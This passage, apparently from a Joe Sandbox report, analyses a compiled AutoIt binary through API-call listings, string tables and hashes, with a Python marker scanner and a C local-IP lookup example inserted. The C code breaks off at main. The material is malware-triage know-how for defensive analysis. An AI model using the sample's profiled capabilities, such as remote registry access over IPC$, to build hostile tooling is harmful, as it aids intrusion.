• SetCurrentDirectoryW.KERNEL32(?), ref: 00F4DDDB
• SetCurrentDirectoryW.KERNEL32(?), ref: 00F4DDFC
• _wcscpy.LIBCMT ref: 00F4DE08
• SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 00F4DE47
Strings
Memory Dump Source
• Source File: 00000000.00000002.1729732647.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
• Associated: 00000000.00000002.1729717927.0000000000EE0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1729788981.0000000000F6F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1729788981.0000000000F94000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1729827694.0000000000F9E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1729851644.0000000000FA7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_ee0000_3i1gMM8K4z.jbxd
Similarity
• API ID: CurrentDirectoryTime$File$Local_wcscat$System__wsplitpath_wcscpy
• String ID: *.*
• API String ID: 3566783562-438819550
• Opcode ID: 96cf6d68ad125bc1844b4f00f8c7752979ffa4781c74c5a1dc305f22fb125807
• Instruction ID: 4dbab59fd56076b1fa07c12d2ea2c9c30c1385179958bc5f2c5a38075e6a20b3
• Opcode Fuzzy Hash: 96cf6d68ad125bc1844b4f00f8c7752979ffa4781c74c5a1dc305f22fb125807
• Instruction Fuzzy Hash: 9761AF725043459FCB10EF20C8849AEB7E8FF89324F04482EF999D7251DB75E945DB92
APIs
• LoadStringW.USER32(00000066,?,00000FFF,00000016), ref: 00F49C7F
  • Part of subcall function 00EE7DE1: _memmove.LIBCMT ref: 00EE7E22
• LoadStringW.USER32(00000072,?,00000FFF,?), ref: 00F49CA0
• __swprintf.LIBCMT ref: 00F49CF9
• __swprintf.LIBCMT ref: 00F49D12
• _wprintf.LIBCMT ref: 00F49DB9
• _wprintf.LIBCMT ref: 00F49DD7
Strings
Memory Dump Source
• Source File: 00000000.00000002.1729732647.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
• Associated: 00000000.00000002.1729717927.0000000000EE0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1729788981.0000000000F6F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1729788981.0000000000F94000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1729827694.0000000000F9E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1729851644.0000000000FA7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_ee0000_3i1gMM8K4z.jbxd
Similarity
• API ID: LoadString__swprintf_wprintf$_memmove
• String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Incorrect parameters to object property !$Line %d (File "%s"):$^ ERROR
• API String ID: 311963372-3080491070
• Opcode ID: 0b149e0d3bf851f5188462759fd2807e23f776b7f468efe2e91ee90c10823c40
• Instruction ID: f2fe7052f9da1305639c061db19f12982ff84d460250aa3e9e7919b9b2b045a5
• Opcode Fuzzy Hash: 0b149e0d3bf851f5188462759fd2807e23f776b7f468efe2e91ee90c10823c40
• Instruction Fuzzy Hash: 4E51D172D0420EAADF14EBE1CD46EEEBBB8AF04300F100065F505720A2EB756F49EB61
APIs
  • Part of subcall function 00EE9837: __itow.LIBCMT ref: 00EE9862
  • Part of subcall function 00EE9837: __swprintf.LIBCMT ref: 00EE98AC
• CharLowerBuffW.USER32(?,?), ref: 00F4A3CB
• GetDriveTypeW.KERNEL32 ref: 00F4A418
• mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00F4A460
• mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00F4A497
• mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00F4A4C5
  • Part of subcall function 00EE7BCC: _memmove.LIBCMT ref: 00EE7C06
Strings
Memory Dump Source
• Source File: 00000000.00000002.1729732647.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
• Associated: 00000000.00000002.1729717927.0000000000EE0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1729788981.0000000000F6F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1729788981.0000000000F94000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1729827694.0000000000F9E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1729851644.0000000000FA7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_ee0000_3i1gMM8K4z.jbxd
Similarity
• API ID: SendString$BuffCharDriveLowerType__itow__swprintf_memmove
• String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
• API String ID: 2698844021-4113822522
• Opcode ID: 0fb08e037f4295f0ddde5b5d9507e96f5f34afed3d68b6c2fd655c2bccaea3aa
• Instruction ID: da2a4bc407348480d5ca75bdd1d86af7567246da2fad0394d336a0c0cccad03d
• Opcode Fuzzy Hash: 0fb08e037f4295f0ddde5b5d9507e96f5f34afed3d68b6c2fd655c2bccaea3aa
• Instruction Fuzzy Hash: AF517F715043499FC700EF11C88196EB7E4EF95758F10486DF896A7262DB31ED0ADB42
APIs
• GetModuleHandleW.KERNEL32(00000000,?,00000FFF,00000001,00000000,00000000,?,00F1E029,00000001,0000138C,00000001,00000000,00000001,?,00000000,00000000), ref: 00F3F8DF
• LoadStringW.USER32(00000000,?,00F1E029,00000001), ref: 00F3F8E8
  • Part of subcall function 00EE7DE1: _memmove.LIBCMT ref: 00EE7E22
• GetModuleHandleW.KERNEL32(00000000,00FA5310,?,00000FFF,?,?,00F1E029,00000001,0000138C,00000001,00000000,00000001,?,00000000,00000000,00000001), ref: 00F3F90A
• LoadStringW.USER32(00000000,?,00F1E029,00000001), ref: 00F3F90D
• __swprintf.LIBCMT ref: 00F3F95D
• __swprintf.LIBCMT ref: 00F3F96E
• _wprintf.LIBCMT ref: 00F3FA17
• MessageBoxW.USER32(00000000,?,?,00011010), ref: 00F3FA2E
Strings
Memory Dump Source
• Source File: 00000000.00000002.1729732647.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
• Associated: 00000000.00000002.1729717927.0000000000EE0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1729788981.0000000000F6F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1729788981.0000000000F94000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1729827694.0000000000F9E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1729851644.0000000000FA7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_ee0000_3i1gMM8K4z.jbxd
Similarity
• API ID: HandleLoadModuleString__swprintf$Message_memmove_wprintf
• String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR
• API String ID: 984253442-2268648507
APIs
Similarity
• API ID: _free$__malloc_crt__recalloc_crt_strlen$EnvironmentVariable___wtomb_environ__calloc_crt__getptd_noexit__invoke_watson_copy_environ
• String ID:
• API String ID: 884005220-0
APIs
• CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,00000000,?), ref: 00F6BA56
• GetFileSize.KERNEL32(00000000,00000000), ref: 00F6BA6D
• GlobalAlloc.KERNEL32(00000002,00000000), ref: 00F6BA78
• CloseHandle.KERNEL32(00000000), ref: 00F6BA85
• GlobalLock.KERNEL32(00000000), ref: 00F6BA8E
• ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 00F6BA9D
• GlobalUnlock.KERNEL32(00000000), ref: 00F6BAA6
• CloseHandle.KERNEL32(00000000), ref: 00F6BAAD
• CreateStreamOnHGlobal.OLE32(00000000,00000001,?), ref: 00F6BABE
• OleLoadPicture.OLEAUT32(?,00000000,00000000,00F72CAC,?), ref: 00F6BAD7
• GlobalFree.KERNEL32(00000000), ref: 00F6BAE7
• GetObjectW.GDI32(?,00000018,000000FF), ref: 00F6BB0B
• CopyImage.USER32(?,00000000,?,?,00002000), ref: 00F6BB36
• DeleteObject.GDI32(00000000), ref: 00F6BB5E
• SendMessageW.USER32(?,00000172,00000000,00000000), ref: 00F6BB74
Similarity
• API ID: Global$File$CloseCreateHandleObject$AllocCopyDeleteFreeImageLoadLockMessagePictureReadSendSizeStreamUnlock
• String ID:
• API String ID: 3840717409-0
APIs
• __wsplitpath.LIBCMT ref: 00F4DA10
• _wcscat.LIBCMT ref: 00F4DA28
• _wcscat.LIBCMT ref: 00F4DA3A
• GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00F4DA4F
• SetCurrentDirectoryW.KERNEL32(?), ref: 00F4DA63
• GetFileAttributesW.KERNEL32(?), ref: 00F4DA7B
• SetFileAttributesW.KERNEL32(?,00000000), ref: 00F4DA95
• SetCurrentDirectoryW.KERNEL32(?), ref: 00F4DAA7
Strings
Similarity
• API ID: CurrentDirectory$AttributesFile_wcscat$__wsplitpath
• String ID: *.*
• API String ID: 34673085-438819550
APIs
  • Part of subcall function 00EE2612: GetWindowLongW.USER32(?,000000EB), ref: 00EE2623
• PostMessageW.USER32(?,00000111,00000000,00000000), ref: 00F6C1FC
• GetFocus.USER32 ref: 00F6C20C
• GetDlgCtrlID.USER32(00000000), ref: 00F6C217
• _memset.LIBCMT ref: 00F6C342
• GetMenuItemInfoW.USER32(?,00000000,00000000,?), ref: 00F6C36D
• GetMenuItemCount.USER32(?), ref: 00F6C38D
• GetMenuItemID.USER32(?,00000000), ref: 00F6C3A0
• GetMenuItemInfoW.USER32(?,-00000001,00000001,?), ref: 00F6C3D4
• GetMenuItemInfoW.USER32(?,?,00000001,?), ref: 00F6C41C
• CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 00F6C454
• DefDlgProcW.USER32(?,00000111,?,?,?,?,?,?,?), ref: 00F6C489
Strings
Similarity
• API ID: ItemMenu$Info$CheckCountCtrlFocusLongMessagePostProcRadioWindow_memset
• String ID: 0
• API String ID: 1296962147-4108050209
APIs
• GetDC.USER32(00000000), ref: 00F5738F
• CreateCompatibleBitmap.GDI32(00000000,00000007,?), ref: 00F5739B
• CreateCompatibleDC.GDI32(?), ref: 00F573A7
• SelectObject.GDI32(00000000,?), ref: 00F573B4
• StretchBlt.GDI32(00000006,00000000,00000000,00000007,?,?,?,?,00000007,?,00CC0020), ref: 00F57408
• GetDIBits.GDI32(00000006,?,00000000,00000000,00000000,00000028,00000000), ref: 00F57444
• GetDIBits.GDI32(00000006,?,00000000,?,00000000,00000028,00000000), ref: 00F57468
• SelectObject.GDI32(00000006,?), ref: 00F57470
• DeleteObject.GDI32(?), ref: 00F57479
• DeleteDC.GDI32(00000006), ref: 00F57480
• ReleaseDC.USER32(00000000,?), ref: 00F5748B
Strings
Similarity
• API ID: Object$BitsCompatibleCreateDeleteSelect$BitmapReleaseStretch
• String ID: (
• API String ID: 2598888154-3887548279
APIs
  • Part of subcall function 00F00957: GetCurrentDirectoryW.KERNEL32(00007FFF,?,?,?,00EE6B0C,?,00008000), ref: 00F00973
  • Part of subcall function 00EE4750: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00EE4743,?,?,00EE37AE,?), ref: 00EE4770
• SetCurrentDirectoryW.KERNEL32(?,?,?,?,00000000), ref: 00EE6BAD
• SetCurrentDirectoryW.KERNEL32(?), ref: 00EE6CFA
  • Part of subcall function 00EE586D: _wcscpy.LIBCMT ref: 00EE58A5
  • Part of subcall function 00F0363D: _iswctype.LIBCMT ref: 00F03645
Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1729732647.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1729717927.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729827694.0000000000F9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729851644.0000000000FA7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_ee0000_3i1gMM8K4z.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: CurrentDirectory$FullNamePath_iswctype_wcscpy
                                                                                                                            • String ID: #include depth exceeded. Make sure there are no recursive includes$>>>AUTOIT SCRIPT<<<$AU3!$Bad directive syntax error$EA06$Error opening the file$Unterminated string
                                                                                                                            • API String ID: 537147316-1018226102
                                                                                                                            • Opcode ID: ec60b31980a52516b2b1899aeb87289e494c95dd83cbdbcd24b194d2f8010e38
                                                                                                                            • Instruction ID: 5fbdd6ae758dd5c1a8d523507febf43e1b45b9e629cf06fb769c037e422cd971
                                                                                                                            • Opcode Fuzzy Hash: ec60b31980a52516b2b1899aeb87289e494c95dd83cbdbcd24b194d2f8010e38
                                                                                                                            • Instruction Fuzzy Hash: 1002DF315083859FC714EF21C881AAFBBE5FF99358F14081DF895A72A1DB30D989DB52
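The function above is the AutoIt runtime's script loader: its string table carries the ">>>AUTOIT SCRIPT<<<" marker together with the "AU3!" and "EA06" tags, which is what the report's "Binary is likely a compiled AutoIt script file" signature keys on. The following scanner is an added example written for this page, not code from Joe Sandbox or the AutoIt project: it locates those markers in an arbitrary byte blob so a triage script can flag a compiled AutoIt binary before deeper analysis. It assumes (as the report does not state) that in a compiled payload the two tags appear back to back as "AU3!EA06", and the sample blob it scans is constructed inline.

```python
"""Flag a byte blob that looks like a compiled AutoIt script (added example)."""
import sys

# Markers seen in the AutoIt runtime's loader string table on this page.
MARKER = b">>>AUTOIT SCRIPT<<<"
MARKER_UTF16 = MARKER.decode("ascii").encode("utf-16-le")  # runtime is a Unicode build
# Assumption: in the embedded script stream the two tags are contiguous.
# Older AutoIt 3 builds used "EA05" in place of "EA06".
SCRIPT_TAG = b"AU3!EA06"

NEEDLES = {
    "script_tag": SCRIPT_TAG,
    "marker_ascii": MARKER,
    "marker_utf16": MARKER_UTF16,
}


def find_autoit_markers(data: bytes) -> dict:
    """Return every offset at which each marker occurs (empty list when absent)."""
    hits = {name: [] for name in NEEDLES}
    for name, needle in NEEDLES.items():
        start = 0
        while True:
            idx = data.find(needle, start)
            if idx < 0:
                break
            hits[name].append(idx)
            start = idx + 1  # keep scanning for further copies
    return hits


def looks_like_autoit(data: bytes) -> bool:
    """True when the script tag or the loader marker (either encoding) is present."""
    hits = find_autoit_markers(data)
    return any(hits[name] for name in NEEDLES)


def scan_file(path: str) -> dict:
    """Scan a file on disk; returns the offsets dict plus a verdict."""
    with open(path, "rb") as fh:
        data = fh.read()
    result = find_autoit_markers(data)
    result["verdict"] = looks_like_autoit(data)
    return result


# Constructed stand-in for a PE image: a fake header, the wide marker as the
# runtime would carry it, then the assumed script tag further on.
SAMPLE = (
    b"MZ" + b"\x00" * 62 + b"PE\x00\x00" + b"\x00" * 200
    + MARKER_UTF16 + b"\x00" * 32 + SCRIPT_TAG + b"\x00" * 16
)

if __name__ == "__main__":
    target = sys.argv[1] if len(sys.argv) > 1 else None
    print(scan_file(target) if target else find_autoit_markers(SAMPLE))
```

Run it with a path to scan a real file; with no argument it reports the offsets inside the constructed sample. A hit on the UTF-16 marker alone tells you only that the AutoIt interpreter stub is present, so on a real sample follow up by extracting the script resource rather than treating the match as the payload itself.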
APIs
• _memset.LIBCMT ref: 00F42D50
• GetMenuItemInfoW.USER32(00000000,00000007,00000000,00000030), ref: 00F42DDD
• GetMenuItemCount.USER32(00FA5890), ref: 00F42E66
• DeleteMenu.USER32(00FA5890,00000005,00000000,000000F5,?,?), ref: 00F42EF6
• DeleteMenu.USER32(00FA5890,00000004,00000000), ref: 00F42EFE
• DeleteMenu.USER32(00FA5890,00000006,00000000), ref: 00F42F06
• DeleteMenu.USER32(00FA5890,00000003,00000000), ref: 00F42F0E
• GetMenuItemCount.USER32(00FA5890), ref: 00F42F16
• SetMenuItemInfoW.USER32(00FA5890,00000004,00000000,00000030), ref: 00F42F4C
• GetCursorPos.USER32(?), ref: 00F42F56
• SetForegroundWindow.USER32(00000000), ref: 00F42F5F
• TrackPopupMenuEx.USER32(00FA5890,00000000,?,00000000,00000000,00000000), ref: 00F42F72
• PostMessageW.USER32(00000000,00000000,00000000,00000000), ref: 00F42F7E
Memory Dump Source
• Source File: 00000000.00000002.1729732647.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
• Associated: 00000000.00000002.1729717927.0000000000EE0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1729788981.0000000000F6F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1729788981.0000000000F94000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1729827694.0000000000F9E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1729851644.0000000000FA7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_ee0000_3i1gMM8K4z.jbxd
Similarity
• API ID: Menu$DeleteItem$CountInfo$CursorForegroundMessagePopupPostTrackWindow_memset
• String ID:
• API String ID: 3993528054-0
• Opcode ID: 0c79d796b542746f02e1fa38107b3705c80cea9e5d1f8164ce2ee06064545679
• Instruction ID: c0c53968858d921bdc423516286fbc995e24945628e03d9c90af75228e5950eb
• Opcode Fuzzy Hash: 0c79d796b542746f02e1fa38107b3705c80cea9e5d1f8164ce2ee06064545679
• Instruction Fuzzy Hash: 8271E571A00209BAEB618F54DC45FAABF64FF04324F940236FA25AA1E1C7B55C14F7A1
APIs
  • Part of subcall function 00EE7BCC: _memmove.LIBCMT ref: 00EE7C06
• _memset.LIBCMT ref: 00F3786B
• WNetAddConnection2W.MPR(?,?,?,00000000), ref: 00F378A0
• RegConnectRegistryW.ADVAPI32(?,80000002,?), ref: 00F378BC
• RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?,?,SOFTWARE\Classes\), ref: 00F378D8
• RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,?,?,SOFTWARE\Classes\), ref: 00F37902
• CLSIDFromString.OLE32(?,?,?,SOFTWARE\Classes\), ref: 00F3792A
• RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 00F37935
• RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 00F3793A
Memory Dump Source
• Source File: 00000000.00000002.1729732647.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
• Associated: 00000000.00000002.1729717927.0000000000EE0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1729788981.0000000000F6F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1729788981.0000000000F94000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1729827694.0000000000F9E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1729851644.0000000000FA7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_ee0000_3i1gMM8K4z.jbxd
Similarity
• API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue_memmove_memset
• String ID: SOFTWARE\Classes\$\CLSID$\IPC$
• API String ID: 1411258926-22481851
• Opcode ID: 4a06093802b8fe1f5f1e3ed637f1f9ad9508461f6fa864832c33b16a2a4b3061
• Instruction ID: 271602b34bea6bdfe3c564590a65ea8e8f6040e660c243a47e8690627f549fe0
• Opcode Fuzzy Hash: 4a06093802b8fe1f5f1e3ed637f1f9ad9508461f6fa864832c33b16a2a4b3061
• Instruction Fuzzy Hash: EF411872C1422DABDF21EBA5EC85DEDB7B8BF04360F004129E955B7161DB719D04DB90
APIs
• CharUpperBuffW.USER32(?,?,?,?,?,?,?,00F5FDAD,?,?), ref: 00F60E31
Memory Dump Source
• Source File: 00000000.00000002.1729732647.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
• Associated: 00000000.00000002.1729717927.0000000000EE0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1729788981.0000000000F6F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1729788981.0000000000F94000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1729827694.0000000000F9E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1729851644.0000000000FA7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_ee0000_3i1gMM8K4z.jbxd
Similarity
• API ID: BuffCharUpper
• String ID: HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU
• API String ID: 3964851224-909552448
• Opcode ID: 3a611e52b7d6366a83b0a9366f61cbb7b1d6737eb06861a733ad7cb30170aae5
• Instruction ID: 2d3102d4bcc904b7f0721554c0d658b614544cee8a85dfccb48a8f6227cca413
• Opcode Fuzzy Hash: 3a611e52b7d6366a83b0a9366f61cbb7b1d6737eb06861a733ad7cb30170aae5
• Instruction Fuzzy Hash: 1E41793261428A8BDF21EF18DC51AEF3365EF21314F254418FC551B292DF799A1AFBA0
APIs
• GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,00000000,?,00F1E2A0,00000010,?,Bad directive syntax error,00F6F910,00000000,?,?,?,>>>AUTOIT SCRIPT<<<), ref: 00F3F7C2
• LoadStringW.USER32(00000000,?,00F1E2A0,00000010), ref: 00F3F7C9
  • Part of subcall function 00EE7DE1: _memmove.LIBCMT ref: 00EE7E22
• _wprintf.LIBCMT ref: 00F3F7FC
• __swprintf.LIBCMT ref: 00F3F81E
• MessageBoxW.USER32(00000000,00000001,00000001,00011010), ref: 00F3F88D
Memory Dump Source
• Source File: 00000000.00000002.1729732647.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
• Associated: 00000000.00000002.1729717927.0000000000EE0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1729788981.0000000000F6F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1729788981.0000000000F94000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1729827694.0000000000F9E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1729851644.0000000000FA7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_ee0000_3i1gMM8K4z.jbxd
Similarity
• API ID: HandleLoadMessageModuleString__swprintf_memmove_wprintf
• String ID: Error: $%s (%d) : ==> %s.: %s %s$.$Line %d (File "%s"):$Line %d:
• API String ID: 1506413516-4153970271
• Opcode ID: 9a21209262dd415e9170585f08f99c2358f12f4a4de009dda83fc2e6835c2e81
• Instruction ID: 4daa20bd882585c69fb167676bc853c97b950ed51f1ffdfaa62ccbbd944996bb
• Opcode Fuzzy Hash: 9a21209262dd415e9170585f08f99c2358f12f4a4de009dda83fc2e6835c2e81
• Instruction Fuzzy Hash: A6216D32D0021EEBDF11EF91CC0AEEE7779BF19310F040466F515660A2EA729668EB51
APIs
  • Part of subcall function 00EE7BCC: _memmove.LIBCMT ref: 00EE7C06
  • Part of subcall function 00EE7924: _memmove.LIBCMT ref: 00EE79AD
• mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 00F45330
• mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 00F45346
• mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00F45357
• mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 00F45369
• mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 00F4537A
Memory Dump Source
• Source File: 00000000.00000002.1729732647.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
• Associated: 00000000.00000002.1729717927.0000000000EE0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1729788981.0000000000F6F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1729788981.0000000000F94000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1729827694.0000000000F9E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1729851644.0000000000FA7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_ee0000_3i1gMM8K4z.jbxd
Similarity
• API ID: SendString$_memmove
• String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
• API String ID: 2279737902-1007645807
• Opcode ID: e9ee736f7fe362c27117b5fd2f7656a925924c879aa38fdec6d99bd18a0bcc96
• Instruction ID: 47176010611b33b09deb6ea5394b500b66c33886544805ba13960836c24acad2
• Opcode Fuzzy Hash: e9ee736f7fe362c27117b5fd2f7656a925924c879aa38fdec6d99bd18a0bcc96
• Instruction Fuzzy Hash: 9111B621D5015D7AEB20BBA2DC49DFFBBBCEBD6F90F000429B851A20D2DEA04D05D562
                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1729732647.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1729717927.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729827694.0000000000F9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729851644.0000000000FA7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_ee0000_3i1gMM8K4z.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: _wcscpy$CleanupStartup_memmove_strcatgethostbynamegethostnameinet_ntoa
                                                                                                                            • String ID: 0.0.0.0
                                                                                                                            • API String ID: 208665112-3771769585
                                                                                                                            • Opcode ID: 84cc8ec1c4564aeb522fdd097ff99d937df1d0ed5a31d9b2cfa6ad453c50b9f0
                                                                                                                            • Instruction ID: 34f57d9697b318153c0fd4d5bcac6c82851e93e7d07db50877959e2a9a28a4ad
                                                                                                                            • Opcode Fuzzy Hash: 84cc8ec1c4564aeb522fdd097ff99d937df1d0ed5a31d9b2cfa6ad453c50b9f0
                                                                                                                            • Instruction Fuzzy Hash: 3211D831904119AFDB14AB30EC4AFDE7BBCEB41721F0401B6F945A6091EF74AD86B661
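The record above groups gethostname, gethostbyname and inet_ntoa with the literal 0.0.0.0: the classic way for a process to learn its own primary IPv4 address, with 0.0.0.0 written when resolution fails. The following is an added example, not code recovered from the sample, showing that sequence in its POSIX form so it can be compiled and run outside Windows; the Windows build uses the same three functions from ws2_32.dll after WSAStartup. The function names format_ipv4, local_ipv4 and is_dotted_quad are this example's own.

```c
/* Added example: gethostname -> gethostbyname -> inet_ntoa with a "0.0.0.0"
 * fallback, the same call pattern as the listed function.  Not the sample's code. */
#define _DEFAULT_SOURCE
#include <arpa/inet.h>
#include <netdb.h>
#include <netinet/in.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>
#include <unistd.h>

#define IPV4_FALLBACK "0.0.0.0"

/* Render a network-order IPv4 address as a dotted quad into out (>= 16 bytes).
 * inet_ntoa returns a pointer to static storage, so the result is copied out
 * at once rather than handed back to the caller. */
const char *format_ipv4(uint32_t addr_net_order, char *out, size_t out_len)
{
    struct in_addr ia;
    ia.s_addr = addr_net_order;
    snprintf(out, out_len, "%s", inet_ntoa(ia));
    return out;
}

/* Resolve this machine's own hostname and write its first IPv4 address.
 * Returns 1 on success.  On any failure (no hostname, resolver failure,
 * no AF_INET record) it writes IPV4_FALLBACK and returns 0, which is the
 * behaviour the "0.0.0.0" literal in the listing points at. */
int local_ipv4(char *out, size_t out_len)
{
    char host[256];
    struct hostent *he;
    struct in_addr ia;

    snprintf(out, out_len, "%s", IPV4_FALLBACK);
    if (gethostname(host, sizeof host) != 0)
        return 0;
    host[sizeof host - 1] = '\0';   /* gethostname need not NUL-terminate on overflow */

    he = gethostbyname(host);
    if (he == NULL || he->h_addrtype != AF_INET || he->h_addr_list[0] == NULL)
        return 0;

    memcpy(&ia, he->h_addr_list[0], sizeof ia);
    format_ipv4(ia.s_addr, out, out_len);
    return 1;
}

/* True if s is a syntactically valid dotted quad: what a collector should
 * check before trusting an address reported by a client. */
int is_dotted_quad(const char *s)
{
    struct in_addr ia;
    return inet_pton(AF_INET, s, &ia) == 1;
}

int main(void)
{
    char ip[INET_ADDRSTRLEN];
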